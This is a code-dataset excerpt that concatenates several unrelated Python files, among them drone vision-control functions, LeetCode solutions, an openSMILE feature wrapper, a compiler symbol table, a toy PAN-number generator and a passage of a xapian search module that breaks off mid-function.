\n    img_b_r[img_sv] = 0\n    img_b_g[img_sv] = 0\n    img_b_b[img_s 45:\n            print(cir[clr], clr, 'detected')\n            cv2.imwrite(clr+'circle.png', img)\n            if abs(cir[clr][0][0]-self.cen['x'])>30 or abs(cir[clr][0][1]-self.cen['y'])>30 or cir[clr][0][2] < (self.cen['z']-30):\n                x_e = (cir[clr][0][0]-self.cen['x'])\n                z_e = (self.cen['z']-cir[clr][0][2])\n                y_e = (self.cen['y']-cir[clr][0][1])\n                return \"rc {} {} {} {}\".format(\n                    self.pd('x',sign(x_e)*log(abs(x_e)+1)),\n                    0.5*self.pd('z',sign(z_e)*log(abs(z_e)+1)),\n                    1.2*self.pd('y',sign(y_e)*log(abs(y_e)+1)),\n                    0)\n            #return \"rc {} {} {} {}\".format((cir[clr][0][0]-180)/2.6+(cir[clr][0][0]-180),(80-cir[clr][0][2])/1.5,(100-cir[clr][0][1])/2,0)\n        self.clear()\n        return True\n    def object(self, df, img, label=\"'F22'\"):\n        try:\n            df = df.query(\"name == \"+label)\n            df = df.reset_index()\n            df, obj, cor = obj_filter(df, img, label)\n        except : return \"rc {} {} {} {}\".format(0,0,0,50)\n        if df.empty == True:\n            return \"rc {} {} {} {}\".format(0,0,0,50)\n        #print(df)\n        xmax = int(df['xmax'][0])\n        xmin = int(df['xmin'][0])\n        ymax = int(df['ymax'][0])\n        ymin = int(df['ymin'][0])\n        x = int((xmax+xmin)/2)\n        y = int((ymax+ymin)/2)\n        size = int(np.sqrt(((xmax-xmin)*(ymax-ymin))))\n        if size > 60:\n            print([x,y, size], label, 'detected')\n        if abs(x-self.cen['x'])>30 or abs(y-self.cen['y'])>30 or size < (self.cen['z']-40):\n            x_e = (x-self.cen['x'])\n            z_e = (self.cen['z']-size)\n            y_e = (self.cen['y']-y)\n            return \"rc {} {} {} {}\".format(\n                0.5*self.pd('x',sign(x_e)*log(abs(x_e)+1)),\n                0.4*self.pd('z',sign(z_e)*log(abs(z_e)+1)),\n                0.5*self.pd('y',sign(y_e)*log(abs(y_e)+1)),\n                0)\n        self.clear()\n        cv2.imwrite('KAU.jpg', img)\n        return True\n    def plane(self, df, img, label=\"'F22'\"):\n        if df.empty == True:\n            return \"rc {} {} {} {}\".format(0,0,0,0)\n        xmax = int(df['xmax'][0])\n        xmin = int(df['xmin'][0])\n        ymax = int(df['ymax'][0])\n        ymin = int(df['ymin'][0])\n        x = int((xmax+xmin)/2)\n        y = int((ymax+ymin)/2)\n        size = int(np.sqrt(((xmax-xmin)*(ymax-ymin))))\n        if size > 60:\n            print([x,y, size], label, 'detected')\n            cv2.imwrite('F22_.jpg', img)\n        if abs(x-self.cen['x'])>20:\n            x_e = (x-self.cen['x'])\n            z_e = (self.cen['z']-size)\n            y_e = (self.cen['y']-y)\n            return \"rc {} {} {} {}\".format(\n                0.5*self.pd('x',sign(x_e)*log(abs(x_e)+1)), 0, 0, 0)\n        self.clear()\n        return True\n\ndef obj_filter(df, img, label=\"'F22'\"):\n    obj = []\n    cor = []\n    df = df.drop('index', axis=1)\n    for i in range(df.shape[0]):\n        X = int(df['xmax'][i])\n        x = int(df['xmin'][i])\n        Y = int(df['ymax'][i])\n        y = int(df['ymin'][i])\n        frame = img[y:Y, x:X]\n        hsv = cv2.cvtColor(frame, cv2.COLOR_BGR2HSV)\n        hist = cv2.calcHist(hsv, [0], None, [10], [0,256])\n        hist_std = hist/np.sum(hist)\n        #print(hist_std[0], hist_std[1], hist_std[2], hist_std[3], hist_std[4], hist_std[5], hist_std[6], hist_std[7], hist_std[8], hist_std[9])\n        if label == \"'KAU'\":\n            if hist_std[5]+hist_std[6]+hist_std[7] > 0.2:\n                obj.append(frame)\n                cor.append([x,X,y,Y])\n            else: df = df.drop(i)\n        if label == \"'F22'\":\n            if hist_std[5]+hist_std[6]+hist_std[7] > 0.2:\n                obj.append(frame)\n                cor.append([x,X,y,Y])\n            else: df = df.drop(i)\n    df = df.reset_index()\n    df = df.drop('index', axis=1)\n    return df, obj, cor\n\ndef puttext(img, txt, org, clr=(0,0,0)):\n    cv2.putText(img, txt, org, cv2.FONT_HERSHEY_PLAIN, 1, (0,0,0))\n    return img\n\ndef sign(i):\n    if i<0 : return -1\n    return 1\n\n'''\ndef calc(formula):\n    num1 = int(formula[0])\n    num2 = int(formula[2])\n    oper = formula[1]\n    if oper == '+':\n        return num1+num2\n    elif oper == '-':\n        return 
num1-num2\n elif oper == '*':\n return num1*num2\n elif oper == '/':\n return num1/num2\n else: return 'X'\n\ndef imageGP(img):\n qrd=qr()\n src = np.copy(img)\n height, width, channel = src.shape\n\n srcPoint1 = np.array([[0, 0], [width-200, 0], [width-200, height], [0, height]], dtype=np.float32)\n srcPoint2 = np.array([[0, 0], [width - 100, 0], [width - 100, height], [0, height]], dtype=np.float32)\n srcPoint3 = np.array([[200, 0], [width, 0], [width, height], [200, height]], dtype=np.float32)\n srcPoint4 = np.array([[100, 0], [width, 0], [width, height], [100, height]], dtype=np.float32)\n dstPoint = np.array([[0, 0], [width, 0], [width, height], [0, height]], dtype=np.float32)\n\n matrix1 = cv2.getPerspectiveTransform(srcPoint1, dstPoint)\n dst1 = cv2.warpPerspective(src, matrix1, (width, height))\n matrix2 = cv2.getPerspectiveTransform(srcPoint2, dstPoint)\n dst2 = cv2.warpPerspective(src, matrix2, (width, height))\n matrix3 = cv2.getPerspectiveTransform(srcPoint3, dstPoint)\n dst3 = cv2.warpPerspective(src, matrix3, (width, height))\n matrix4 = cv2.getPerspectiveTransform(srcPoint4, dstPoint)\n dst4 = cv2.warpPerspective(src, matrix4, (width, height))\n \n qr_value = qrd.detect(src)\n if qr_value != '':\n return qr_value\n qr_value = qrd.detect(dst1)\n if qr_value != '':\n return qr_value\n qr_value = qrd.detect(dst2)\n if qr_value != '':\n return qr_value\n qr_value = qrd.detect(dst3)\n if qr_value != '':\n return qr_value\n qr_value = qrd.detect(dst4)\n if qr_value != '':\n return qr_value\n return ''\n\ndef box_det(img, r=20):\n img_gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n _, img_bin = cv2.threshold(img_gray, 0, 255, cv2.THRESH_OTSU) # white+else so, binary\n cnt, _ = cv2.findContours(img_bin, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)\n img_con = np.copy(img)\n rect = []\n color = []\n cent = []\n area = img.shape[0]*img.shape[1]\n for pts in cnt:\n if cv2.contourArea(pts)<2000 or cv2.contourArea(pts)>area*0.8:\n continue\n eps = 0.05*cv2.arcLength(pts, True)\n app = cv2.approxPolyDP(pts, eps, True)\n cor = len(app)\n if cor == 4: # rectangular\n cent = np.mean(app, axis=0).astype(np.uint16).squeeze()\n color_ = clr(img,cent, r)\n cv2.drawContours(img_con, [app], 0,(0,255,255), 3)\n if color_ != 'X':\n cv2.circle(img_con, cent, 5, (0,255,255), 2)\n cv2.putText(img_con, clr(img,cent, r), cent+10, cv2.FONT_HERSHEY_PLAIN, 1, (0,255,255))\n rect.append(cent)\n color.append(color_)\n #cv2.imshow('Bin', img_bin)\n #cv2.imshow('Con', img_con)\n #cv2.imshow('canny', canny)\n if len(color) == 0:\n color = None\n else: color = color[0]\n return cent, color, img_con\n \ndef mission_action(i):\n #i = calc(s) # string >> calculating\n a1 = \"\"\n a2 = \"\"\n a3 = \"\"\n a4 = \"\"\n if i == 1:\n a1 = \"up {}\".format(30)\n a2 = \"down {}\".format(30)\n print('answer = 1, up 30, down 30')\n if i == 2:\n a1 = \"back {}\".format(30)\n a2 = \"flip {}\".format(\"f\")\n print('answer = 2, flip forward')\n if i == 3:\n a1 = \"down {}\".format(30)\n a2 = \"up {}\".format(30)\n print('answer = 3, down 30, up 30')\n if i == 4:\n a1 = \"right {}\".format(20)\n a2 = \"flip {}\".format(\"l\") \n print('answer = 4, flip left')\n if i == 5:\n a1 = \"cw {}\".format(360) \n print('answer = 5, clockwise 360')\n return a1, a2\n\ndef circle(img, img_bin):\n img_c = np.copy(img)\n #img = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n c = cv2.HoughCircles(img_bin, cv2.HOUGH_GRADIENT, 1, 20)\n #print(c)\n if type(c) == type(None):\n return img_c, c\n c = np.uint16(np.around(c))\n if c[0][0].ndim == 1:\n for i in 
c[0,:]:\n cv2.circle(img_c,(i[0],i[1]),i[2],(0,255,0),2)\n cv2.circle(img_c,(i[0],i[1]),2,(0,0,255),3)\n return img_c, c\n\ndef mission(num, drone):\n if num == 1:\n drone.move_up(30)\n drone.move_down(30)\n elif num == 2:\n drone.flip_forward()\n elif num == 3:\n drone.move_down(30)\n drone.move_up(30)\n elif num == 4:\n drone.flip_left()\n elif num == 5:\n drone.rotate_clockwise(360)\n else: return 'X'\n\ndef clr(img, pts, r):\n pix = np.uint8([[img[pts[1],pts[0]]]])\n hsv = cv2.cvtColor(pix, cv2.COLOR_BGR2HSV).squeeze()\n #print(hsv)\n h = hsv[0]\n #s = hsv[1]\n v = hsv[2]\n if v > 100: return 'X'\n if (h < r or h > 180-r): return 'R' #and s < 210+r and s > 210-r and v < 140+r and v > 140-r\n if h < 68+r and h > 68-r: return 'G' #and s < 138+r and s > 138-r and v < 90+r and v > 90-r\n if h < 108+r and h > 108-r: return 'B' #and s < 240+r and s > 240-r and v < 115+r and v > 115-r\n return 'X'\n\ndef circle_follow(cir, clr):\n if len(cir[clr]) == 0:\n return \"rc {} {} {} {}\".format(0,0,0,50)\n if cir[clr][0][2] > 60:\n print(cir[clr], clr, 'detected')\n if abs(cir[clr][0][0]-180)>15 or abs(cir[clr][0][1]-100)>30:\n return \"rc {} {} {} {}\".format((cir[clr][0][0]-180)/2.6,0,(100-cir[clr][0][1])/2,0)\n if cir[clr][0][2] < 70:#40:\n return \"rc {} {} {} {}\".format(0,(80-cir[clr][0][2])/1.5,0,0)\n return True\n'''\n","repo_name":"blu-y/eml","sub_path":"main_func.py","file_name":"main_func.py","file_ext":"py","file_size_in_byte":20413,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"35592259661","text":"#螺旋矩阵\nclass Solution:\n \"\"\"\n @param: : a matrix of m x n elements\n @return: an integer list\n \"\"\"\n\n def spiralOrder(self, matrix):\n # write your code here\n if matrix == []:\n return []\n m = len(matrix)\n n = len(matrix[0])\n I = []\n leg = 0\n reg = n - 1\n aeg = 0\n beg = m - 1\n while (leg < reg) and (aeg < beg):\n for i in range(leg, reg):\n I.append(matrix[aeg][i])\n for i in range(aeg, beg):\n I.append(matrix[i][reg])\n for i in range(reg, leg, -1):\n I.append(matrix[beg][i])\n for i in range(beg, aeg, -1):\n I.append(matrix[i][leg])\n leg = leg + 1\n reg = reg - 1\n aeg = aeg + 1\n beg = beg - 1\n if leg == reg:\n for i in range(aeg, beg + 1):\n I.append(matrix[i][leg])\n elif aeg == beg:\n for i in range(leg, reg + 1):\n I.append(matrix[aeg][i])\n return I\n ","repo_name":"huaiyizhao/Python-Scripts","sub_path":"1.py","file_name":"1.py","file_ext":"py","file_size_in_byte":1082,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"14929051560","text":"import os\nfrom global_vars import *\nimport tempfile\nimport numpy as np\nimport subprocess\n\nOPENSMILE_PATH = os.path.join(ROOT_FOLDER, \"opensmile-2.3.0//bin//Win32//SMILExtract_Release.exe\")\nCONFIG_PATH = os.path.join(ROOT_FOLDER, \"opensmile-2.3.0//config//emobase.conf\")\nWAV_FOLDER = os.path.join(ROOT_FOLDER, \"datasets//IEMOCAP//wavs_word_level\")\nOUTPUT_FOLDER = os.path.join(ROOT_FOLDER, \"datasets//IEMOCAP//features//audio//emobase_word_level\")\n\ncmdline_base = OPENSMILE_PATH + \" -configfile \" + CONFIG_PATH\n\ndef get_emobase_features(audio_file):\n \"\"\"\n Reads the emobase feature set out of the openSMILE tool and returns the featureset as float array\n (989 features per audio file)\n :param audio_file:\n :return:\n \"\"\"\n cmdline = cmdline_base + \" -inputfile \" + audio_file\n with tempfile.TemporaryDirectory() as temp_dir:\n temp_file = os.path.join(temp_dir, 'out.arff')\n cmdline 
+= \" -arffout \" + temp_file\n with open(os.devnull, 'wb') as devnull:\n subprocess.call(cmdline, stdout=devnull, stderr=subprocess.STDOUT)\n\n with open(temp_file, \"rb\") as f:\n # only read last line (parts copied from https://stackoverflow.com/questions/3346430)\n f.seek(-2, os.SEEK_END)\n while f.read(1) != b\"\\n\":\n f.seek(-2, os.SEEK_CUR)\n last = str(f.readline())\n # remove everything before and after the last comma to only get the features\n if len(last.split(',')) <= 1:\n print('No features for ' + audio_file)\n return\n cleaned_last_line = last.split(',', 1)[1]\n cleaned_last_line = cleaned_last_line.rsplit(',', 1)[0]\n emobase_features = np.array(cleaned_last_line.split(',')).astype(np.float)\n return emobase_features","repo_name":"HenryvanderVegte/masters_thesis","sub_path":"preprocessing/openSMILE/openSMILE_wrapper.py","file_name":"openSMILE_wrapper.py","file_ext":"py","file_size_in_byte":1808,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"34"} +{"seq_id":"69983875299","text":"class Solution:\n def checkInclusion(self, s1: str, s2: str) -> bool:\n s1dict = {}\n for char in s1:\n s1dict[char] = 1 + s1dict.get(char,0)\n \n window = len(s1)\n for i in range(len(s2)-window+1):\n s2dict = {}\n for j in range(i,i+window):\n s2dict[s2[j]] = 1 + s2dict.get(s2[j],0)\n if s1dict == s2dict:\n return True\n return False\n ","repo_name":"bvedang/Data-Structure-and-Algorithms","sub_path":"0567-permutation-in-string/0567-permutation-in-string.py","file_name":"0567-permutation-in-string.py","file_ext":"py","file_size_in_byte":460,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"5448880893","text":"from parser.variable_address import VariablesAddress\nimport sys\n\n\nclass FunctionTable(object):\n '''\n Class to keep variable semantics.\n Created using a dictionary of dictionaries that stores the names of the functions as keys for O(1) search time\n and the rest of the values as a dictionary. e.j. 
{'funcName':{'name':'funcName','type':'int',...}}.\n Stores the latest added function name to add all the next variables to that scope.\n Variables are added to a new table added as a value to the function dictionary.\n '''\n\n def __init__(self) -> None:\n self.functionNameMap = {}\n self.constantTable = {'size': {}, 'vars': {}}\n self.currFunction = ''\n self.currFunctionScope = ''\n self.programName = ''\n self.currType = ''\n\n def addFunction(self, row: dict, type: str) -> None:\n '''\n Checks name of function does not exist, then adds it to the dictionary using it's name as key.\n Sets current function as this function.\n Raises syntaxerror if function already exists.\n '''\n if row['name'] not in self.functionNameMap:\n self.functionNameMap[row['name']] = row\n self.currFunction = row['name']\n self.currFunctionScope = type\n else:\n sys.exit(\"Error: function name already in use\")\n\n def addVariables(self, row: dict, name: str = None, size: int = 1) -> None:\n '''\n Function to add variables to current function.\n Uses last added function as default, but an extra optional parameter with the name of the function is accepted.\n Adds 1 to the function size in the table.\n '''\n if name and name in self.functionNameMap and row['name'] not in self.functionNameMap[name]['variables']:\n self.functionNameMap[name]['variables'][row['name']] = row\n elif row['name'] not in self.functionNameMap[self.currFunction]['variables']:\n self.functionNameMap[self.currFunction]['variables'][row['name']] = row\n else:\n sys.exit(\"Error: variable name '\" +\n row['name'] + \"' already in use\")\n\n self.addSize(row['type'], size)\n\n def addParameters(self, type: str) -> None:\n '''\n Function to add parameters types to current function table.\n '''\n self.functionNameMap[self.currFunction]['parameters'].append(type)\n\n def getParameter(self, function: str, idx: int) -> str:\n '''\n Function to get parameter type of given function and the index.\n '''\n paramCount = len(self.functionNameMap[function]['parameters'])\n if paramCount > idx:\n return self.functionNameMap[function]['parameters'][idx]\n else:\n sys.exit(\n f'Error: function {function} only takes {paramCount} arguments')\n\n def getParameterCount(self, function: str) -> str:\n '''\n Function to get parameter count of given function.\n '''\n return len(self.functionNameMap[function]['parameters'])\n\n def getFunction(self, name: str) -> dict:\n '''\n Function that returns the dictionary of the name of function given.\n Returns empty dict if name does not exist.\n '''\n if name in self.functionNameMap:\n return self.functionNameMap[name]\n return {}\n\n def addSize(self, type: str, size: int = 1) -> None:\n '''\n Adds size given or 1 to current function size.\n '''\n if type in self.functionNameMap[self.currFunction]['size']:\n self.functionNameMap[self.currFunction]['size'][type] += size\n else:\n self.functionNameMap[self.currFunction]['size'][type] = size\n\n def getFunctions(self) -> dict:\n '''\n Returns the whole dictionary of functions and variables.\n '''\n return self.functionNameMap\n\n def getConstants(self) -> dict:\n '''\n Returns the whole dictionary of constants.\n '''\n return self.constantTable\n\n def deleteFunction(self, name: str) -> bool:\n '''\n Deletes function given the name.\n Returns true if deleted, false otherwise.\n '''\n if name in self.functionNameMap:\n self.functionNameMap.pop(name)\n return True\n return False\n\n def deleteFunctionVariables(self, name: str) -> None:\n '''\n Deletes function given the name.\n 
Returns true if deleted, false otherwise.\n '''\n if name in self.functionNameMap:\n self.functionNameMap[name].pop('variables')\n else:\n sys.exit(f'Error: function {name} not declared')\n\n def functionExists(self, name: str) -> None:\n '''\n Raises syntax error if funciton does not exist.\n '''\n if name not in self.functionNameMap:\n sys.exit(f'Error: function {name} not declared')\n\n def setCurrentFunction(self, name: str, scope: str) -> None:\n '''\n Sets current function.\n '''\n self.currFunction = name\n self.currFunctionScope = scope\n\n def getCurrentFunction(self) -> str:\n '''\n Gets current function.\n '''\n return self.currFunction\n\n def getCurrentFunctionScope(self) -> str:\n '''\n Gets current function.\n '''\n return self.currFunctionScope\n\n def getCurrentType(self) -> str:\n '''\n Returns current type.\n '''\n return self.currType\n\n def setCurrentType(self, name: str) -> None:\n '''\n Sets current type.\n '''\n self.currType = name\n\n def setProgramName(self, name: str) -> None:\n '''\n Sets program name.\n '''\n self.programName = name\n\n def getProgramName(self) -> str:\n '''\n Gets program name.\n '''\n return self.programName\n\n def getFuncitonSize(self, name: str) -> dict:\n '''\n Gets function size.\n '''\n return self.functionNameMap[name]['size']\n\n def getVariable(self, name: str) -> dict:\n '''\n Checks if variable is declared and returns it's info, raises syntax error if not declared.\n '''\n if name in self.functionNameMap[self.currFunction]['variables']:\n return self.functionNameMap[self.currFunction]['variables'][name]\n elif name in self.functionNameMap[self.programName]['variables']:\n return self.functionNameMap[self.programName]['variables'][name]\n sys.exit(\n f'Error: variable {name} not declared in scope or global variables')\n\n def getGlobalVariable(self, name: str) -> dict:\n '''\n Returns the given function global variable.\n '''\n if name in self.functionNameMap[self.programName]['variables']:\n return self.functionNameMap[self.programName]['variables'][name]\n sys.exit(\n f'Error: variable {name} not declared in scope or global variables')\n\n def getFunctionReturnType(self, name: str) -> dict:\n '''\n Returns given function return type.\n '''\n return self.functionNameMap[name]['returnType']\n\n def deleteTable(self) -> None:\n '''\n Deletes table.\n '''\n del self.functionNameMap\n\n def isConstant(self, cons: any) -> bool:\n '''\n Check if constant exists in the table.\n '''\n return cons in self.constantTable['vars']\n\n def addConstant(self, cons: any, address: int, type: str) -> None:\n '''\n Adds constant to table.\n '''\n self.constantTable['vars'][cons] = (address, type)\n if type in self.constantTable['size']:\n self.constantTable['size'][type] += 1\n else:\n self.constantTable['size'][type] = 1\n\n def getConstant(self, cons: any) -> int:\n '''\n Returns constant address.\n '''\n return self.constantTable['vars'][cons][0]\n\n def getFunctionStartingAddress(self, function: str) -> int:\n '''\n Returns function starting address.\n '''\n if function in self.functionNameMap:\n return self.functionNameMap[function]['address']\n else:\n sys.exit(\n f'ERROR: function {function} was not found')\n\n def verifyReturnType(self, type: str) -> None:\n '''\n Verifies the return type is the same as the one expected in the function, sets has return flag as true\n '''\n functionReturnType = self.functionNameMap[self.currFunction]['returnType']\n if functionReturnType != type:\n sys.exit(\n f'ERROR: return type {type} does not match 
function return type {functionReturnType}')\n else:\n self.functionNameMap[self.currFunction]['hasReturn'] = True\n\n def verifyHasReturn(self) -> None:\n '''\n Verifies the function if not void, had a return statement\n '''\n if not self.functionNameMap[self.currFunction]['hasReturn'] and self.functionNameMap[self.currFunction]['returnType'] != 'void':\n sys.exit(\n f'ERROR: function {self.currFunction} has no return statement')\n\n def setFunctionMap(self, map: dict) -> None:\n '''\n Function to set the function map from one previously created.\n '''\n self.functionNameMap = map\n\n def setConstantTable(self, map: dict) -> None:\n '''\n Function to set the constant table from one previously created.\n '''\n self.constantTable = map\n\n\nclass SemanticCube(object):\n '''\n Class to keep semantic cube and access it.\n It utilizes a dictornay of dictionaries to access the result in constant O(1) time.\n '''\n\n def __init__(self) -> None:\n self.cube = {\n \"int\": {\n \"int\": {\n \"+\": \"int\",\n \"/\": \"int\",\n \"<\": \"bool\",\n \"=\": \"int\",\n \"&\": \"bool\",\n },\n \"float\": {\n \"+\": \"float\",\n \"/\": \"float\",\n \"<\": \"bool\",\n \"=\": \"int\",\n },\n \"char\": {\n \"+\": \"err\",\n \"/\": \"err\",\n \"<\": \"err\",\n \"=\": \"err\",\n },\n \"bool\": {\n \"+\": \"err\",\n \"/\": \"err\",\n \"<\": \"err\",\n \"=\": \"err\",\n \"&\": \"bool\",\n },\n\n },\n \"float\": {\n \"int\": {\n \"+\": \"float\",\n \"/\": \"float\",\n \"<\": \"bool\",\n \"=\": \"float\",\n },\n \"float\": {\n \"+\": \"float\",\n \"/\": \"float\",\n \"<\": \"bool\",\n \"=\": \"float\",\n },\n \"char\": {\n \"+\": \"err\",\n \"/\": \"err\",\n \"<\": \"err\",\n \"=\": \"err\",\n },\n \"bool\": {\n \"+\": \"err\",\n \"/\": \"err\",\n \"<\": \"err\",\n \"=\": \"err\",\n },\n\n },\n \"char\": {\n \"int\": {\n \"+\": \"err\",\n \"/\": \"err\",\n \"<\": \"err\",\n \"=\": \"err\",\n },\n \"float\": {\n \"+\": \"err\",\n \"/\": \"err\",\n \"<\": \"err\",\n \"=\": \"err\",\n },\n \"char\": {\n \"+\": \"err\",\n \"/\": \"err\",\n \"<\": \"err\",\n \"=\": \"char\",\n },\n \"bool\": {\n \"+\": \"err\",\n \"/\": \"err\",\n \"<\": \"err\",\n \"=\": \"err\",\n },\n\n },\n \"bool\": {\n \"int\": {\n \"+\": \"err\",\n \"/\": \"err\",\n \"<\": \"err\",\n \"=\": \"bool\",\n \"&\": \"bool\",\n },\n \"float\": {\n \"+\": \"err\",\n \"/\": \"err\",\n \"<\": \"err\",\n \"=\": \"bool\",\n },\n \"char\": {\n \"+\": \"err\",\n \"/\": \"err\",\n \"<\": \"err\",\n \"=\": \"err\",\n },\n \"bool\": {\n \"+\": \"err\",\n \"/\": \"err\",\n \"<\": \"err\",\n \"=\": \"bool\",\n \"&\": \"bool\",\n },\n\n },\n }\n\n def getResult(self, leftOp: str, rightOp: str, symb: str) -> str:\n '''\n Function that given the left, right operator and the symbol returns the semantic result.\n If result is error, a syntax error will be raised.\n '''\n if symb == '-' or symb == '+':\n symb = '+'\n elif symb == '*' or symb == '/':\n symb = '/'\n elif symb == '<' or symb == '>' or symb == '>=' or symb == '<=' or symb == '==' or symb == '!=':\n symb = '<'\n elif symb == '&' or symb == '|':\n symb = '&'\n\n if leftOp in self.cube:\n if rightOp in self.cube[leftOp]:\n if symb in self.cube[leftOp][rightOp]:\n ans = self.cube[leftOp][rightOp][symb]\n\n if ans != 'err':\n return ans\n\n sys.exit(f'Error: semantic not recognized {leftOp} {symb} 
{rightOp}')\n","repo_name":"adriangzz/mina","sub_path":"parser/variable_semantics.py","file_name":"variable_semantics.py","file_ext":"py","file_size_in_byte":13748,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"3526757439","text":"\"Generating PAN Number.\"\n\n'''\nStructure of PAN number:\n\nThe PAN (or PAN number) is a ten-character long alpha-numeric unique identifier.\n\nThe PAN structure is as follows: Fourth character [P — Individual or Person ] Example: AAAPZ1234C\n\n# The first five characters are letters (in uppercase by default), followed by four numerals, and the last (tenth) character is a letter.\n# The first three characters of the code are three letters forming a sequence of alphabets letters from AAA to ZZZ\n# The fourth character identifies the type of holder of the card. Each holder type is uniquely defined by a letter from the list below:\n A — Association of persons (AOP)\n B — Body of individuals (BOI)\n C — Company\n F — Firm\n G — Government\n H — HUF (Hindu undivided family)\n L — Local authority\n J — Artificial juridical person\n P — Individual or Person\n T — Trust (AOP)\n# The fifth character of the PAN is the first character of either:\n 1.of the surname or last name of the person, in the case of a \"personal\" PAN card, where the fourth character is \"P\" or\n 2.of the name of the entity, trust, society, or organisation in the case of a company/HUF/firm/AOP/trust/BOI/local authority/artificial judicial person/government, where the fourth character is \"C\", \"H\", \"F\", \"A\", \"T\", \"B\", \"L\", \"J\", \"G\".\n# The last (tenth) character is an alphabetic digit used as a check-sum to verify the validity of that current code\n ''' \n\nimport random \nalphabet = {\n '1':'A' , '2':'B' , '3':'C' , '4':'D' ,\n '5':'E' , '6':'F' , '7':'G' , '8':'H' ,\n '9':'I' , '10':'J', '11':'K' , '12':'L',\n '13':'M', '14':'N', '15':'O' , '16':'P',\n '17':'Q', '18':'R', '19':'S' , '20':'T', '21':'U',\n '22':'V', '23':'W', '24':'X' , '25':'Y', '26':'Z'\n }\ntype_of_card = {\n 'COMPANY':'C',\n 'FIRM':'F',\n 'GOVERNMENT':'G',\n 'HUF':'H',\n 'LOCALAUTHORITY':'L',\n 'PERSONAL':'P',\n 'TRUST':'T' \n } \ndef main(): \n print(\" Welcome \")\n Type = input(\"Please enter the type of card :\")\n Normalized_Type = normalize_name(Type)\n if Normalized_Type == 'PERSONAL':\n first_name = input(\"Please enter your first name : \")\n last_name = input(\"Please enter your last name : \")\n age = int(input(\"Please enter your age : \"))\n # If your age is not 18 , you can't have pan card.\n if age < 18 :\n print(\"You are not eligible for PAN card \")\n else : \n pan = get_pan_number(last_name,Normalized_Type)\n print(\"Your PAN card number is : \",pan)\n data = {}\n data['Name']= first_name + \" \" + last_name\n data['Age'] = age\n data['PAN Number'] = pan\n print ('Your PAN card detaiils : ',data)\n else : \n others = input(\"Please enter name : \")\n pan_others = get_pan_number(others,Normalized_Type)\n print ('PAN card number is : ',pan_others)\n pan_2 = {}\n pan_2['Name'] = others\n pan_2['PAN Number'] = pan_others\n print ('PAN card details : ',pan_2)\n\n\ndef normalize_name(s):\n '''\n This function takes a string of alphabets and returns upper case alphabets excluding other charecters between alphabets.\n >>> normalize_name('jodhpur park boys school')\n 'JODHPURPARKBOYSSCHOOL'\n '''\n normalized = ''\n for ch in s:\n if ch.isalpha():\n normalized += ch.upper()\n return normalized\n\n\ndef pad(num, length):\n '''\n >>> 
pad(457,4)\n 0457\n '''\n num_string = str(num)\n while len(num_string) < length:\n # insert a 0 at the start of the string, increasing its length by one\n num_string = \"0\" + num_string\n return num_string\n\n\ndef get_pan_number(name,Type):\n norm = normalize_name(name)\n First = alphabet[str(random.randint(1,26))]\n second = alphabet[str(random.randint(1,26))]\n third = alphabet[str(random.randint(1,26))]\n fourth = type_of_card[Type]\n fifth = norm[0]\n number = pad(random.randint(0,9999),4)\n sixth = norm[random.randint(0,len(norm)-1)]\n pan_id = (First + second + third + fourth + fifth + number + sixth)\n \n return pan_id\n\nif __name__ == '__main__':\n main()\n","repo_name":"nemo138/myproject","sub_path":"project2 (1).py","file_name":"project2 (1).py","file_ext":"py","file_size_in_byte":4271,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"27362218066","text":"r\"\"\"mset_search_results.py: The results of a search performed against xapian.\n\n\"\"\"\n__docformat__ = \"restructuredtext en\"\n\nimport _checkxapian\n\nimport errors\nfrom fieldactions import FieldActions\nfrom indexerconnection import IndexerConnection\nimport math\nimport re\nfrom searchresults import SearchResult\nimport xapian\n\nclass MSetTermWeightGetter(object):\n \"\"\"Object for getting termweights directly from an mset.\n\n \"\"\"\n def __init__(self, mset):\n self.mset = mset\n\n def get(self, term):\n return self.mset.get_termweight(term)\n\n\nclass MSetSearchResultIter(object):\n \"\"\"An iterator over a set of results from a search.\n\n \"\"\"\n def __init__(self, mset, context):\n self.context = context\n self.it = iter(mset)\n\n def next(self):\n return SearchResult(self.it.next(), self.context)\n\n\nclass MSetResultOrdering(object):\n def __init__(self, mset, context, connection):\n self.mset = mset\n self.context = context\n self._conn = connection\n\n def get_iter(self):\n \"\"\"Get an iterator over the search results.\n\n \"\"\"\n return MSetSearchResultIter(self.mset, self.context)\n\n def get_hit(self, index):\n \"\"\"Get the hit with a given index.\n\n \"\"\"\n msetitem = self.mset.get_hit(index)\n return SearchResult(msetitem, self.context)\n\n def get_startrank(self):\n return self.mset.get_firstitem()\n\n def get_endrank(self):\n return self.mset.get_firstitem() + len(self.mset)\n\n def __len__(self):\n \"\"\"Get the number of items in this ordering.\n\n \"\"\"\n return len(self.mset)\n\n def _cluster(self, num_clusters, maxdocs, fields, assume_single_value):\n \"\"\"Cluster results based on similarity.\n\n Note: this method is experimental, and will probably disappear or\n change in the future.\n\n The number of clusters is specified by num_clusters: unless there are\n too few results, there will be exaclty this number of clusters in the\n result.\n\n \"\"\"\n clusterer = xapian.ClusterSingleLink()\n xapclusters = xapian.ClusterAssignments()\n docsim = xapian.DocSimCosine()\n source = xapian.MSetDocumentSource(self.mset, maxdocs)\n\n if fields is None:\n try:\n # backwards compatibility; used to have to supply the index as\n # first param, and didn't have the slotnum option.\n clusterer.cluster(xapclusters, docsim, source, num_clusters)\n except TypeError:\n clusterer.cluster(self._conn._index, xapclusters, docsim, source, num_clusters)\n else:\n # If there's only one field and it has unique instances stored in a\n # value, use the value instead of the termlist.\n slotnum = self._get_singlefield_slot(fields, assume_single_value)\n 
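# Note: xapian's cluster() signature changed across releases; the newer form is tried first, falling back on TypeError below.\n            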
